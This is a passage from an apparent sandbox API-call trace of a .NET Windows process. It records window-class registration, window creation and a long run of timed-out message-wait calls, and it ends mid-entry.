CoTaskMemAlloc (cb=0x58) returned 0x617f18 [0253.686] RegisterClassW (lpWndClass=0x54af884) returned 0xc150 [0253.686] CoTaskMemFree (pv=0x617f18) [0253.687] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.3ce0bb8.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.3ce0bb8.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x70276 [0253.688] NtdllDefWindowProc_W (hWnd=0x70276, Msg=0x81, wParam=0x0, lParam=0x54af3c0) returned 0x1 [0253.691] NtdllDefWindowProc_W (hWnd=0x70276, Msg=0x83, wParam=0x0, lParam=0x54af3ac) returned 0x0 [0253.691] NtdllDefWindowProc_W (hWnd=0x70276, Msg=0x1, wParam=0x0, lParam=0x54af3c0) returned 0x0 [0253.692] NtdllDefWindowProc_W (hWnd=0x70276, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0253.692] NtdllDefWindowProc_W (hWnd=0x70276, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0253.693] SetEvent (hEvent=0x380) returned 1 [0253.693] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0253.822] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0253.930] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.096] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.197] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.300] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.401] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.562] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.685] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0254.787] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.030] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.171] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.276] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.393] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.660] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0255.762] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0256.367] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0257.167] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0259.986] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0260.233] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0260.811] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.006] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.142] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.244] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.346] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.519] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.623] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.729] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.831] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0261.933] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.047] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.303] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.405] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.508] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.612] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.721] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.824] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0262.927] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.029] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.145] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.247] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.349] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.452] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.656] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0263.848] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0264.031] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0264.289] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0264.416] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0264.673] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0265.036] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0265.188] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0265.335] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0265.491] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0265.840] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.092] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.258] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.381] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.486] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.599] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.755] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0266.981] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.136] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.265] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.425] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.526] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.680] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.816] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0267.995] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0268.121] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0268.223] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0268.452] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0268.637] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0269.112] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0269.688] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0270.902] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0271.375] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0271.700] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0271.941] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0274.138] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0274.307] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0274.464] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0275.277] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0275.652] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.364] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.543] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.021] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.180] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.334] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.483] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.641] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.814] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.117] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.253] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.355] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.457] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.559] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.674] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.776] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.878] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.980] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.082] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.252] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.480] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.663] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.893] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.018] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.137] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.297] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.405] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.540] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.890] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.426] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.569] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.715] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.917] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.020] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.125] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.227] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.330] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.431] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.533] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.635] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.737] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.838] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.943] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.045] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.147] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.249] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.353] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.455] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.558] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.665] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.767] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.869] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.973] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.076] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.187] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.289] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.392] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.494] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.600] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.703] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.821] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.924] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.027] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.131] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.233] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.335] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.438] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.541] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.643] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.746] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.850] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.955] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.091] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.260] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.386] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.488] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.642] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.767] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.869] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.657] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.114] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.687] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.861] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.971] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.073] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.176] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.335] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.439] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.542] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0289.855] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0290.018] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0290.758] MsgWaitForMultipleObjectsEx 